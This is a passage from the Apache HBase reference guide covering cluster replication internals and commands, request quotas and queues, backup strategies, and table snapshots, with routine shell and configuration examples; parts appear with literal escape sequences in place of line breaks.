Each region server reads from the oldest log it needs to replicate and keeps track of its progress processing WALs inside ZooKeeper to simplify failure recovery.
The position marker which indicates a slave cluster's progress, as well as the queue of WALs to process, may be different for every slave cluster.

The clusters participating in replication can be of different sizes.
The master cluster relies on randomization to attempt to balance the stream of replication on the slave clusters.
It is expected that the slave cluster has storage capacity to hold the replicated data, as well as any data it is responsible for ingesting.
If a slave cluster does run out of room, or is inaccessible for other reasons, it throws an error and the master retains the WAL and retries the replication at intervals.

.Terminology Changes
[NOTE]
====
Previously, terms such as [firstterm]_master-master_, [firstterm]_master-slave_, and [firstterm]_cyclical_ were used to describe replication relationships in HBase.
These terms added confusion, and have been abandoned in favor of discussions about cluster topologies appropriate for different scenarios.
====

.Cluster Topologies
* A central source cluster might propagate changes out to multiple destination clusters, for failover or due to geographic
distribution.\n* A source cluster might push changes to a destination cluster, which might also push its own changes back to the original cluster.\n* Many different low-latency clusters might push changes to one centralized cluster for backup or resource-intensive data analytics jobs.\n The processed data might then be replicated back to the low-latency clusters.\n\nMultiple levels of replication may be chained together to suit your organization's needs.\nThe following diagram shows a hypothetical scenario.\nUse the arrows to follow the data paths.\n\n.Example of a Complex Cluster Replication Configuration\nimage::hbase_replication_diagram.jpg[]\n\nHBase replication borrows many concepts from the [firstterm]_statement-based replication_ design used by MySQL.\nInstead of SQL statements, entire WALEdits (consisting of multiple cell inserts coming from Put and Delete operations on the clients) are replicated in order to maintain atomicity.\n\n=== Managing and Configuring Cluster Replication\n.Cluster Configuration Overview\n\n. Configure and start the source and destination clusters.\n Create tables with the same names and column families on both the source and destination clusters, so that the destination cluster knows where to store data it will receive.\n. All hosts in the source and destination clusters should be reachable to each other.\n. If both clusters use the same ZooKeeper cluster, you must use a different `zookeeper.znode.parent`, because they cannot write in the same folder.\n. Check to be sure that replication has not been disabled. `hbase.replication` defaults to `true`.\n. On the source cluster, in HBase Shell, add the destination cluster as a peer, using the `add_peer` command.\n. On the source cluster, in HBase Shell, enable the table replication, using the `enable_table_replication` command.\n. Check the logs to see if replication is taking place. If so, you will see messages like the following, coming from the ReplicationSource.\n----\nLOG.info(\"Replicating \"+clusterId + \" -> \" + peerClusterId);\n----\n\n.Cluster Management Commands\nadd_peer <ID> <CLUSTER_KEY>::\n Adds a replication relationship between two clusters. +\n * ID -- a unique string, which must not contain a hyphen.\n * CLUSTER_KEY: composed using the following template, with appropriate place-holders: `hbase.zookeeper.quorum:hbase.zookeeper.property.clientPort:zookeeper.znode.parent`\nlist_peers:: list all replication relationships known by this cluster\nenable_peer <ID>::\n Enable a previously-disabled replication relationship\ndisable_peer <ID>::\n Disable a replication relationship. HBase will no longer send edits to that\n peer cluster, but it still keeps track of all the new WALs that it will need\n to replicate if and when it is re-enabled. WALs are retained when enabling or disabling\n replication as long as peers exist.\nremove_peer <ID>::\n Disable and remove a replication relationship. HBase will no longer send edits to that peer cluster or keep track of WALs.\nenable_table_replication <TABLE_NAME>::\n Enable the table replication switch for all its column families. If the table is not found in the destination cluster then it will create one with the same name and column families.\ndisable_table_replication <TABLE_NAME>::\n Disable the table replication switch for all its column families.\n\n=== Verifying Replicated Data\n\nThe `VerifyReplication` MapReduce job, which is included in HBase, performs a systematic comparison of replicated data between two different clusters. 
Run the VerifyReplication job on the master cluster, supplying it with the peer ID and table name to use for validation.
You can limit the verification further by specifying a time range or specific families.
The job's short name is `verifyrep`.
To run the job, use a command like the following:

[source,bash]
----
$ HADOOP_CLASSPATH=`${HBASE_HOME}/bin/hbase classpath` "${HADOOP_HOME}/bin/hadoop" jar "${HBASE_HOME}/hbase-server-VERSION.jar" verifyrep --starttime=<timestamp> --endtime=<timestamp> --families=<myFam> <ID> <tableName>
----

The `VerifyReplication` command prints out `GOODROWS` and `BADROWS` counters to indicate rows that did and did not replicate correctly.

=== Detailed Information About Cluster Replication

.Replication Architecture Overview
image::replication_overview.png[]

==== Life of a WAL Edit

A single WAL edit goes through several steps in order to be replicated to a slave cluster.

. An HBase client uses a Put or Delete operation to manipulate data in HBase.
. The region server writes the request to the WAL in a way that allows it to be replayed if it is not written successfully.
. If the changed cell corresponds to a column family that is scoped for replication, the edit is added to the queue for replication.
. In a separate thread, the edit is read from the log, as part of a batch process.
 Only the KeyValues that are eligible for replication are kept.
 Replicable KeyValues are part of a column family whose schema is scoped GLOBAL, are not part of a catalog such as `hbase:meta`, did not originate from the target slave cluster, and have not already been consumed by the target slave cluster.
. The edit is tagged with the master's UUID and added to a buffer.
 When the buffer is filled, or the reader reaches the end of the file, the buffer is sent to a random region server on the slave cluster.
. The region server reads the edits sequentially and separates them into buffers, one buffer per table.
 After all edits are read, each buffer is flushed using link:http://hbase.apache.org/apidocs/org/apache/hadoop/hbase/client/Table.html[Table], HBase's normal client.
 The master's UUID and the UUIDs of slaves which have already consumed the data are preserved in the edits when they are applied, in order to prevent replication loops.
. In the master, the offset for the WAL that is currently being replicated is registered in ZooKeeper.

The process differs when the slave cluster is unavailable:

. The first three steps, where the edit is inserted, are identical.
. Again in a separate thread, the region server reads, filters, and ships the log edits in the same way as above.
 The slave region server does not answer the RPC call.
. The master sleeps and tries again a configurable number of times.
. If the slave region server is still not available, the master selects a new subset of region servers to replicate to, and tries again to send the buffer of edits.
. Meanwhile, the WALs are rolled and stored in a queue in ZooKeeper.
 Logs that are [firstterm]_archived_ by their region server, by moving them from the region server's log directory to a central log directory, will update their paths in the in-memory queue of the replicating thread.
. When the slave cluster is finally available, the buffer is applied in the same way as during normal processing.
 The master region server will then replicate the backlog of logs that accumulated during the outage.

.Spreading Queue Failover Load
When replication is active, a subset of region servers in the source cluster is responsible for shipping edits to the sink.
This responsibility must be failed over like all other region server functions should a process or node crash.
The following configuration settings are recommended for maintaining an even distribution of replication activity over the remaining live servers in the source cluster:

* Set `replication.source.maxretriesmultiplier` to `300`.
* Set `replication.source.sleepforretries` to `1` (1 second). This value, combined with the value of `replication.source.maxretriesmultiplier`, causes the retry cycle to last about 5 minutes.
* Set `replication.sleep.before.failover` to `30000` (30 seconds) in the source cluster site configuration.

[[cluster.replication.preserving.tags]]
.Preserving Tags During Replication
By default, the codec used for replication between clusters strips tags, such as cell-level ACLs, from cells.
To prevent the tags from being stripped, you can use a different codec which does not strip them.
Configure `hbase.replication.rpc.codec` to use `org.apache.hadoop.hbase.codec.KeyValueCodecWithTags`, on both the source and sink RegionServers involved in the replication.
This option was introduced in link:https://issues.apache.org/jira/browse/HBASE-10322[HBASE-10322].

==== Replication Internals

Replication State in ZooKeeper::
 HBase replication maintains its state in ZooKeeper.
 By default, the state is contained in the base node _/hbase/replication_.
 This node contains two child nodes, the `Peers` znode and the `RS` znode.

The `Peers` Znode::
 The `peers` znode is stored in _/hbase/replication/peers_ by default.
 It consists of a list of all peer replication clusters, along with the status of each of them.
 The value of each peer is its cluster key, which is provided in the HBase Shell.
 The cluster key contains a list of ZooKeeper nodes in the cluster's quorum, the client port for the ZooKeeper quorum, and the base znode for HBase on that cluster.

The `RS` Znode::
 The `rs` znode contains a list of WAL logs which need to be replicated.
 This list is divided into a set of queues organized by region server and the peer cluster the region server is shipping the logs to.
 The rs znode has one child znode for each region server in the cluster.
 The child znode name is the region server's hostname, client port, and start code.
 This list includes both live and dead region servers.

==== Choosing Region Servers to Replicate To

When a master cluster region server initiates a replication source to a slave cluster, it first connects to the slave's ZooKeeper ensemble using the provided cluster key. It then scans the _rs/_ directory to discover all the available sinks (region servers that are accepting incoming streams of edits to replicate) and randomly chooses a subset of them using a configured ratio which has a default value of 10%.
For example, if a slave cluster has 150 machines, 15 will be chosen as potential recipients for edits that this master cluster region server sends.
Because this selection is performed by each master region server, the probability that all slave region servers are used is very high, and this method works for clusters of any size.
For example, a master cluster of 10 machines replicating to a slave cluster of 5 machines with a ratio of 10% causes the master cluster region servers to choose one machine each at random.

A ZooKeeper watcher is placed on the _${zookeeper.znode.parent}/rs_ node of the slave cluster by each of the master cluster's region servers.
This watch is used to monitor changes in the composition of the slave cluster.
When nodes are removed from the slave cluster, or if nodes go down or come back up, the master cluster's region servers will respond by selecting a new pool of slave region servers to replicate to.

==== Keeping Track of Logs

Each master cluster region server has its own znode in the replication znodes hierarchy.
It contains one znode per peer cluster (if 5 slave clusters, 5 znodes are created), and each of these contains a queue of WALs to process.
Each of these queues will track the WALs created by that region server, but they can differ in size.
For example, if one slave cluster becomes unavailable for some time, the WALs should not be deleted, so they need to stay in the queue while the others are processed.
See <<rs.failover.details,rs.failover.details>> for an example.

When a source is instantiated, it contains the current WAL that the region server is writing to.
During log rolling, the new file is added to the queue of each slave cluster's znode just before it is made available.
This ensures that all the sources are aware that a new log exists before the region server is able to append edits into it, but this operation is more expensive.
The queue items are discarded when the replication thread cannot read more entries from a file (because it reached the end of the last block) and there are other files in the queue.
This means that if a source is up to date and replicates from the log that the region server writes to, reading up to the "end" of the current file will not delete the item in the queue.

A log can be archived if it is no longer used or if the number of logs exceeds `hbase.regionserver.maxlogs` because the insertion rate is faster than regions are flushed.
When a log is archived, the source threads are notified that the path for that log changed.
If a particular source has already finished with an archived log, it will just ignore the message.
If the log is in the queue, the path will be updated in memory.
If the log is currently being replicated, the change will be done atomically so that the reader doesn't attempt to open the file when it has already been moved.
Because moving a file is a NameNode operation, if the reader is currently reading the log, it won't generate any exception.

==== Reading, Filtering and Sending Edits

By default, a source attempts to read from a WAL and ship log entries to a sink as quickly as possible.
Speed is limited by the filtering of log entries: only KeyValues that are scoped GLOBAL and that do not belong to catalog tables will be retained.
Speed is also limited by the total size of the list of edits to replicate per slave, which is limited to 64 MB by default.
With this configuration, a master cluster region server with three slaves would use at most 192 MB to store data to replicate.
This does not account for the data which was filtered but not garbage collected.

Once the maximum size of edits has been buffered or the reader reaches the end of the WAL, the source thread stops reading and chooses at random a sink to replicate to (from the list that was generated by keeping only a subset of slave region servers). It directly issues an RPC to the chosen region server and waits for the method to return.
If the RPC was successful, the source determines whether the current file has been emptied or whether it contains more data which needs to be read.
If the file has been emptied, the source deletes the znode in the queue.
Otherwise, it registers the new offset in the log's znode.
If the RPC threw an exception, the source will retry 10 times before trying to find a different sink.

==== Cleaning Logs

If replication is not enabled, the master's log-cleaning thread deletes old logs using a configured TTL.
This TTL-based method does not work well with replication, because archived logs which have exceeded their TTL may still be in a queue.
The default behavior is augmented so that if a log is past its TTL, the cleaning thread looks up every queue until it finds the log, while caching queues it has found.
If the log is not found in any queues, the log will be deleted.
The next time the cleaning process needs to look for a log, it starts by using its cached list.

NOTE: WALs are saved when replication is enabled or disabled as long as peers exist.

[[rs.failover.details]]
==== Region Server Failover

When no region servers are failing, keeping track of the logs in ZooKeeper adds no value.
Unfortunately, region servers do fail, and since ZooKeeper is highly available, it is useful for managing the transfer of the queues in the event of a failure.

Each of the master cluster region servers keeps a watcher on every other region server, in order to be notified when one dies (just as the master does).
When a failure happens, they all race to create a znode called `lock` inside the dead region server's znode that contains its queues.\nThe region server that creates it successfully then transfers all the queues to its own znode, one at a time since ZooKeeper does not support renaming queues.\nAfter queues are all transferred, they are deleted from the old location.\nThe znodes that were recovered are renamed with the ID of the slave cluster appended with the name of the dead server.\n\nNext, the master cluster region server creates one new source thread per copied queue, and each of the source threads follows the read\/filter\/ship pattern.\nThe main difference is that those queues will never receive new data, since they do not belong to their new region server.\nWhen the reader hits the end of the last log, the queue's znode is deleted and the master cluster region server closes that replication source.\n\nGiven a master cluster with 3 region servers replicating to a single slave with id `2`, the following hierarchy represents what the znodes layout could be at some point in time.\nThe region servers' znodes all contain a `peers` znode which contains a single queue.\nThe znode names in the queues represent the actual file names on HDFS in the form `address,port.timestamp`.\n\n----\n\n\/hbase\/replication\/rs\/\n 1.1.1.1,60020,123456780\/\n 2\/\n 1.1.1.1,60020.1234 (Contains a position)\n 1.1.1.1,60020.1265\n 1.1.1.2,60020,123456790\/\n 2\/\n 1.1.1.2,60020.1214 (Contains a position)\n 1.1.1.2,60020.1248\n 1.1.1.2,60020.1312\n 1.1.1.3,60020, 123456630\/\n 2\/\n 1.1.1.3,60020.1280 (Contains a position)\n----\n\nAssume that 1.1.1.2 loses its ZooKeeper session.\nThe survivors will race to create a lock, and, arbitrarily, 1.1.1.3 wins.\nIt will then start transferring all the queues to its local peers znode by appending the name of the dead server.\nRight before 1.1.1.3 is able to clean up the old znodes, the layout will look like the following:\n\n----\n\n\/hbase\/replication\/rs\/\n 1.1.1.1,60020,123456780\/\n 2\/\n 1.1.1.1,60020.1234 (Contains a position)\n 1.1.1.1,60020.1265\n 1.1.1.2,60020,123456790\/\n lock\n 2\/\n 1.1.1.2,60020.1214 (Contains a position)\n 1.1.1.2,60020.1248\n 1.1.1.2,60020.1312\n 1.1.1.3,60020,123456630\/\n 2\/\n 1.1.1.3,60020.1280 (Contains a position)\n\n 2-1.1.1.2,60020,123456790\/\n 1.1.1.2,60020.1214 (Contains a position)\n 1.1.1.2,60020.1248\n 1.1.1.2,60020.1312\n----\n\nSome time later, but before 1.1.1.3 is able to finish replicating the last WAL from 1.1.1.2, it dies too.\nSome new logs were also created in the normal queues.\nThe last region server will then try to lock 1.1.1.3's znode and will begin transferring all the queues.\nThe new layout will be:\n\n----\n\n\/hbase\/replication\/rs\/\n 1.1.1.1,60020,123456780\/\n 2\/\n 1.1.1.1,60020.1378 (Contains a position)\n\n 2-1.1.1.3,60020,123456630\/\n 1.1.1.3,60020.1325 (Contains a position)\n 1.1.1.3,60020.1401\n\n 2-1.1.1.2,60020,123456790-1.1.1.3,60020,123456630\/\n 1.1.1.2,60020.1312 (Contains a position)\n 1.1.1.3,60020,123456630\/\n lock\n 2\/\n 1.1.1.3,60020.1325 (Contains a position)\n 1.1.1.3,60020.1401\n\n 2-1.1.1.2,60020,123456790\/\n 1.1.1.2,60020.1312 (Contains a position)\n----\n\n=== Replication Metrics\n\nThe following metrics are exposed at the global region server level and (since HBase 0.95) at the peer level:\n\n`source.sizeOfLogQueue`::\n number of WALs to process (excludes the one which is being processed) at the Replication source\n\n`source.shippedOps`::\n number of mutations 
shipped\n\n`source.logEditsRead`::\n number of mutations read from WALs at the replication source\n\n`source.ageOfLastShippedOp`::\n age of last batch that was shipped by the replication source\n\n=== Replication Configuration Options\n\n[cols=\"1,1,1\", options=\"header\"]\n|===\n| Option\n| Description\n| Default\n\n| zookeeper.znode.parent\n| The name of the base ZooKeeper znode used for HBase\n| \/hbase\n\n| zookeeper.znode.replication\n| The name of the base znode used for replication\n| replication\n\n| zookeeper.znode.replication.peers\n| The name of the peer znode\n| peers\n\n| zookeeper.znode.replication.peers.state\n| The name of the peer-state znode\n| peer-state\n\n| zookeeper.znode.replication.rs\n| The name of the rs znode\n| rs\n\n| replication.sleep.before.failover\n| How many milliseconds a worker should sleep before attempting to replicate\n a dead region server's WAL queues.\n|\n\n| replication.executor.workers\n| The number of region servers a given region server should attempt to\n failover simultaneously.\n| 1\n|===\n\n=== Monitoring Replication Status\n\nYou can use the HBase Shell command `status 'replication'` to monitor the replication status on your cluster. The command has three variations:\n\n* `status 'replication'` -- prints the status of each source and its sinks, sorted by hostname.\n* `status 'replication', 'source'` -- prints the status for each replication source, sorted by hostname.\n* `status 'replication', 'sink'` -- prints the status for each replication sink, sorted by hostname.\n\n== Running Multiple Workloads On a Single Cluster\n\nHBase provides the following mechanisms for managing the performance of a cluster\nhandling multiple workloads:\n\n. <<quota>>\n. <<request_queues>>\n. <<multiple-typed-queues>>\n\n[[quota]]\n=== Quotas\nHBASE-11598 introduces quotas, which allow you to throttle requests based on\nthe following limits:\n\n. <<request-quotas,The number or size of requests (read, write, or read+write) in a given timeframe>>\n. <<namespace_quotas,The number of tables allowed in a namespace>>\n\nThese limits can be enforced for a specified user, table, or namespace.\n\n.Enabling Quotas\nQuotas are disabled by default. To enable the feature, set the `hbase.quota.enabled`\nproperty to `true` in the _hbase-site.xml_ file for all cluster nodes.\n\n.General Quota Syntax\n. THROTTLE_TYPE can be expressed as READ, WRITE, or the default type (read + write).\n. Timeframes can be expressed in the following units: `sec`, `min`, `hour`, `day`\n. Request sizes can be expressed in the following units: `B` (bytes), `K` (kilobytes),\n`M` (megabytes), `G` (gigabytes), `T` (terabytes), `P` (petabytes)\n. Numbers of requests are expressed as an integer followed by the string `req`\n. Limits relating to time are expressed as req\/time or size\/time. For instance `10req\/day`\nor `100P\/hour`.\n. Numbers of tables or regions are expressed as integers.\n\n[[request-quotas]]\n.Setting Request Quotas\nYou can set quota rules ahead of time, or you can change the throttle at runtime. The change\nwill propagate after the quota refresh period has expired. This expiration period\ndefaults to 5 minutes. To change it, modify the `hbase.quota.refresh.period` property\nin `hbase-site.xml`. This property is expressed in milliseconds and defaults to `300000`.\n
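\nFor example, the relevant _hbase-site.xml_ entries to enable quotas and shorten the refresh period would look like the following (the `60000` value is only an illustration):\n\n[source,xml]\n----\n<property>\n  <name>hbase.quota.enabled<\/name>\n  <value>true<\/value>\n<\/property>\n<property>\n  <name>hbase.quota.refresh.period<\/name>\n  <value>60000<\/value> <!-- one minute instead of the default five -->\n<\/property>\n----\n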
\nThe examples below show throttles being set, listed, and removed from the HBase shell:\n\n----\n# Limit user u1 to 10 requests per second\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => '10req\/sec'\n\n# Limit user u1 to 10 read requests per second\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => READ, USER => 'u1', LIMIT => '10req\/sec'\n\n# Limit user u1 to 10 M per day everywhere\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => '10M\/day'\n\n# Limit user u1 to 10 M write size per sec\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => WRITE, USER => 'u1', LIMIT => '10M\/sec'\n\n# Limit user u1 to 5k per minute on table t2\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', TABLE => 't2', LIMIT => '5K\/min'\n\n# Limit user u1 to 10 read requests per sec on table t2\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => READ, USER => 'u1', TABLE => 't2', LIMIT => '10req\/sec'\n\n# Remove an existing limit from user u1 on namespace ns2\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', NAMESPACE => 'ns2', LIMIT => NONE\n\n# Limit all users to 10 requests per hour on namespace ns1\nhbase> set_quota TYPE => THROTTLE, NAMESPACE => 'ns1', LIMIT => '10req\/hour'\n\n# Limit all users to 10 T per hour on table t1\nhbase> set_quota TYPE => THROTTLE, TABLE => 't1', LIMIT => '10T\/hour'\n\n# Remove all existing limits from user u1\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => NONE\n\n# List all quotas for user u1 in namespace ns2\nhbase> list_quotas USER => 'u1', NAMESPACE => 'ns2'\n\n# List all quotas for namespace ns2\nhbase> list_quotas NAMESPACE => 'ns2'\n\n# List all quotas for table t1\nhbase> list_quotas TABLE => 't1'\n\n# List all quotas\nhbase> list_quotas\n----\n\nYou can also place a global limit and exclude a user or a table from the limit by applying the\n`GLOBAL_BYPASS` property.\n\n----\nhbase> set_quota NAMESPACE => 'ns1', LIMIT => '100req\/min' # a per-namespace request limit\nhbase> set_quota USER => 'u1', GLOBAL_BYPASS => true # user u1 is not affected by the limit\n----\n\n[[namespace_quotas]]\n.Setting Namespace Quotas\nYou can specify the maximum number of tables or regions allowed in a given namespace, either\nwhen you create the namespace or by altering an existing namespace, by setting the\n`hbase.namespace.quota.maxtables` or `hbase.namespace.quota.maxregions` property on the namespace.\n\n.Limiting Tables Per Namespace\n----\n# Create a namespace with a max of 5 tables\nhbase> create_namespace 'ns1', {'hbase.namespace.quota.maxtables'=>'5'}\n\n# Alter an existing namespace to have a max of 8 tables\nhbase> alter_namespace 'ns2', {METHOD => 'set', 'hbase.namespace.quota.maxtables'=>'8'}\n\n# Show quota information for a namespace\nhbase> describe_namespace 'ns2'\n\n# Alter an existing namespace to remove a quota\nhbase> alter_namespace 'ns2', {METHOD => 'unset', NAME => 'hbase.namespace.quota.maxtables'}\n----\n\n.Limiting Regions Per Namespace\n----\n# Create a namespace with a max of 10 regions\nhbase> create_namespace 'ns1', {'hbase.namespace.quota.maxregions'=>'10'}\n\n# Show quota information for a namespace\nhbase> describe_namespace 'ns1'\n\n# Alter an existing namespace to have a max of 20 regions\nhbase> alter_namespace 'ns2', {METHOD => 'set', 'hbase.namespace.quota.maxregions'=>'20'}\n\n# Alter an existing namespace to remove a quota\nhbase> alter_namespace 'ns2', {METHOD => 'unset', NAME => 'hbase.namespace.quota.maxregions'}\n----\n\n[[request_queues]]\n=== Request Queues\nIf no throttling policy is configured, when the RegionServer receives multiple requests,\nthey are now placed into a 
queue waiting for a free execution slot (HBASE-6721).\nThe simplest queue is a FIFO queue, where each request waits for all previous requests in the queue\nto finish before running. Fast or interactive queries can get stuck behind large requests.\n\nIf you are able to guess how long a request will take, you can reorder requests by\npushing the long requests to the end of the queue and allowing short requests to preempt\nthem. Eventually, you must still execute the large requests and prioritize the new\nrequests behind them. The short requests will be newer, so the result is not terrible,\nbut still suboptimal compared to a mechanism which allows large requests to be split\ninto multiple smaller ones.\n\nHBASE-10993 introduces such a system for deprioritizing long-running scanners. There\nare two types of queues, `fifo` and `deadline`. To configure the type of queue used,\nconfigure the `hbase.ipc.server.callqueue.type` property in `hbase-site.xml`. There\nis no way to estimate how long each request may take, so de-prioritization only affects\nscans, and is based on the number of \u201cnext\u201d calls a scan request has made. An assumption\nis made that when you are doing a full table scan, your job is not likely to be interactive,\nso if there are concurrent requests, you can delay long-running scans up to a limit tunable by\nsetting the `hbase.ipc.server.queue.max.call.delay` property. The slope of the delay is calculated\nby a simple square root of `(numNextCall * weight)` where the weight is\nconfigurable by setting the `hbase.ipc.server.scan.vtime.weight` property.\n\n[[multiple-typed-queues]]\n=== Multiple-Typed Queues\n\nYou can also prioritize or deprioritize different kinds of requests by configuring\na specified number of dedicated handlers and queues. You can segregate the scan requests\nin a single queue with a single handler, and all the other available queues can service\nshort `Get` requests.\n\nYou can adjust the IPC queues and handlers based on the type of workload, using static\ntuning options. This approach is an interim first step that will eventually allow\nyou to change the settings at runtime, and to dynamically adjust values based on the load.\n\n.Multiple Queues\nTo avoid contention and separate different kinds of requests, configure the\n`hbase.ipc.server.callqueue.handler.factor` property, which allows you to increase the number of\nqueues and control how many handlers can share the same queue.\n\nUsing more queues reduces contention when adding a task to a queue or selecting it\nfrom a queue. You can even configure one queue per handler. The trade-off is that\nif some queues contain long-running tasks, a handler may need to wait to execute from that queue\nrather than stealing from another queue which has waiting tasks.\n\n.Read and Write Queues\nWith multiple queues, you can now divide read and write requests, giving more priority\n(more queues) to one or the other type. Use the `hbase.ipc.server.callqueue.read.ratio`\nproperty to choose to serve more reads or more writes.\n\n.Get and Scan Queues\nSimilar to the read\/write split, you can split gets and scans by tuning the `hbase.ipc.server.callqueue.scan.ratio`\nproperty to give more priority to gets or to scans. A scan ratio of `0.1` will give\nmore queue\/handlers to the incoming gets, which means that more gets can be processed\nat the same time and that fewer scans can be executed at the same time. A value of\n`0.9` will give more queue\/handlers to scans, so the number of scans executed will\nincrease and the number of gets will decrease.\n
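\nAs an illustration, the following _hbase-site.xml_ fragment combines the three properties discussed above; the values are arbitrary examples, not recommendations:\n\n[source,xml]\n----\n<!-- one call queue for every two handlers -->\n<property>\n  <name>hbase.ipc.server.callqueue.handler.factor<\/name>\n  <value>0.5<\/value>\n<\/property>\n<!-- 60% of the queues serve reads, the rest serve writes -->\n<property>\n  <name>hbase.ipc.server.callqueue.read.ratio<\/name>\n  <value>0.6<\/value>\n<\/property>\n<!-- of the read queues, favor gets over scans -->\n<property>\n  <name>hbase.ipc.server.callqueue.scan.ratio<\/name>\n  <value>0.1<\/value>\n<\/property>\n----\n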
\n\n[[ops.backup]]\n== HBase Backup\n\nThere are two broad strategies for performing HBase backups: backing up with a full cluster shutdown, and backing up on a live cluster.\nEach approach has pros and cons.\n\nFor additional information, see link:http:\/\/blog.sematext.com\/2011\/03\/11\/hbase-backup-options\/[HBase Backup\n Options] over on the Sematext Blog.\n\n[[ops.backup.fullshutdown]]\n=== Full Shutdown Backup\n\nSome environments can tolerate a periodic full shutdown of their HBase cluster, for example if it is being used as a back-end analytic capacity and not serving front-end web-pages.\nThe benefit is that the NameNode\/Master and RegionServers are down, so there is no chance of missing any in-flight changes to either StoreFiles or metadata.\nThe obvious con is that the cluster is down.\nThe steps include:\n\n[[ops.backup.fullshutdown.stop]]\n==== Stop HBase\n\n\n\n[[ops.backup.fullshutdown.distcp]]\n==== Distcp\n\nDistcp could be used to copy the contents of the HBase directory in HDFS either to the same cluster in another directory, or to a different cluster.\n\nNote: Distcp works in this situation because the cluster is down and there are no in-flight edits to files.\nDistcp-ing of files in the HBase directory is not generally recommended on a live cluster.\n\n[[ops.backup.fullshutdown.restore]]\n==== Restore (if needed)\n\nThe backup of the hbase directory from HDFS is copied onto the 'real' hbase directory via distcp.\nThe act of copying these files creates new HDFS metadata, which is why a restore of the NameNode edits from the time of the HBase backup isn't required for this kind of restore, because it's a restore (via distcp) of a specific HDFS directory (i.e., the HBase part), not the entire HDFS file-system.\n\n[[ops.backup.live.replication]]\n=== Live Cluster Backup - Replication\n\nThis approach assumes that there is a second cluster.\nSee the HBase page on link:http:\/\/hbase.apache.org\/book.html#replication[replication] for more information.\n\n[[ops.backup.live.copytable]]\n=== Live Cluster Backup - CopyTable\n\nThe <<copy.table,copytable>> utility could either be used to copy data from one table to another on the same cluster, or to copy data to another table on another cluster.\n\nSince the cluster is up, there is a risk that edits could be missed in the copy process.\n\n[[ops.backup.live.export]]\n=== Live Cluster Backup - Export\n\nThe <<export,export>> approach dumps the content of a table to HDFS on the same cluster.\nTo restore the data, the <<import,import>> utility would be used.\n\nSince the cluster is up, there is a risk that edits could be missed in the export process.\n\n[[ops.snapshots]]\n== HBase Snapshots\n\nHBase Snapshots allow you to take a snapshot of a table without too much impact on Region Servers.\nSnapshot, clone, and restore operations don't involve data copying.\nAlso, exporting the snapshot to another cluster doesn't have an impact on the Region Servers.\n\nPrior to version 0.94.6, the only way to back up or to clone a table was to use CopyTable\/ExportTable, or to copy all the hfiles in HDFS after disabling the table.\nThe disadvantages of these methods are that you can degrade region server performance (Copy\/Export Table) or you need to disable the table, which means no reads or writes, and this is usually unacceptable.\n\n[[ops.snapshots.configuration]]\n=== Configuration\n\nTo turn on the 
snapshot support just set the `hbase.snapshot.enabled` property to true.\n(Snapshots are enabled by default in 0.95+ and off by default in 0.94.6+)\n\n[source,xml]\n----\n\n <property>\n <name>hbase.snapshot.enabled<\/name>\n <value>true<\/value>\n <\/property>\n----\n\n[[ops.snapshots.takeasnapshot]]\n=== Take a Snapshot\n\nYou can take a snapshot of a table regardless of whether it is enabled or disabled.\nThe snapshot operation doesn't involve any data copying.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> snapshot 'myTable', 'myTableSnapshot-122112'\n----\n\n.Take a Snapshot Without Flushing\nThe default behavior is to perform a flush of data in memory before the snapshot is taken.\nThis means that data in memory is included in the snapshot.\nIn most cases, this is the desired behavior.\nHowever, if your set-up can tolerate data in memory being excluded from the snapshot, you can use the `SKIP_FLUSH` option of the `snapshot` command to disable flushing while taking the snapshot.\n\n----\nhbase> snapshot 'mytable', 'snapshot123', {SKIP_FLUSH => true}\n----\n\nWARNING: There is no way to determine or predict whether a concurrent insert or update will be included in a given snapshot, whether flushing is enabled or disabled.\nA snapshot is only a representation of a table during a window of time.\nThe amount of time the snapshot operation will take to reach each Region Server may vary from a few seconds to a minute, depending on the resource load and speed of the hardware or network, among other factors.\nThere is also no way to know whether a given insert or update is in memory or has been flushed.\n\n[[ops.snapshots.list]]\n=== Listing Snapshots\n\nList all snapshots taken (by printing the names and relative information).\n\n----\n\n$ .\/bin\/hbase shell\nhbase> list_snapshots\n----\n\n[[ops.snapshots.delete]]\n=== Deleting Snapshots\n\nYou can remove a snapshot, and the files retained for that snapshot will be removed if they are no longer needed.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> delete_snapshot 'myTableSnapshot-122112'\n----\n\n[[ops.snapshots.clone]]\n=== Clone a table from snapshot\n\nFrom a snapshot you can create a new table (clone operation) with the same data that you had when the snapshot was taken.\nThe clone operation doesn't involve data copies, and a change to the cloned table doesn't impact the snapshot or the original table.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> clone_snapshot 'myTableSnapshot-122112', 'myNewTestTable'\n----\n\n[[ops.snapshots.restore]]\n=== Restore a snapshot\n\nThe restore operation requires the table to be disabled, and the table will be restored to the state at the time when the snapshot was taken, changing both data and schema if required.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> disable 'myTable'\nhbase> restore_snapshot 'myTableSnapshot-122112'\n----\n\nNOTE: Since replication works at the log level and snapshots at the file-system level, after a restore, the replicas will be in a different state from the master.\nIf you want to use restore, you need to stop replication and redo the bootstrap.\n\nIn case of partial data-loss due to a misbehaving client, instead of a full restore that requires the table to be disabled, you can clone the table from the snapshot and use a Map-Reduce job to copy the data that you need from the clone to the main table.\n\n[[ops.snapshots.acls]]\n=== Snapshot operations and ACLs\n\nIf you are using security with the AccessController Coprocessor (See <<hbase.accesscontrol.configuration,hbase.accesscontrol.configuration>>), 
